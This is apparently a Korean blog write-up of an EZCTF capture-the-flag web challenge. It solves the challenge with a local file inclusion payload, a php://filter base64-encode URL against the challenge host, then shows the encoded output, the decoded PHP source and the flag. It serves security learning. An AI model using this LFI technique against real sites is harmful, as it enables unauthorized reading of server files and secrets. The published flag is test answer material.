1. 개요
php filter bypass 문제
2. 풀이
1) robots.txt
robots.txt에 접속하면 flag.php에 플래가 있다고 합니다.
다만, filter가 걸려있어 확인 할 수 없습니다.
2) LFI
flag를 읽으면서 base64로 인코딩하여 결과를 확인합니다.
http://ez.ctf.cafe:9999/blog-posts.php?file=php://filter/convert.base64-encode/resource=flag.phpPD9waHAKCWVjaG8gJ0hvdyBkbyB5b3UgZmlsdGVyIHlvdXIgY29mZmVlPyc7ICAgIAoJLy8gRVotQ1RGe0xGSV8xU18zWn0KPz4K3) Base64
디코딩하면 PHP파일을 읽어줍니다.
<?php
echo 'How do you filter your coffee?';
// EZ-CTF{LFI_1S_3Z}
?>'CTF' 카테고리의 다른 글
| [EZCTF] Neo (0) | 2022.06.05 |
|---|---|
| [EZCTF] Super Secure (0) | 2022.06.05 |
| [SECCON Beginners CTF 2022] BeginnersBof (0) | 2022.06.05 |
| [SECCON Beginners CTF 2022] CoughingFox (0) | 2022.06.05 |
| [SECCON Beginners CTF 2022] Quiz (0) | 2022.06.05 |
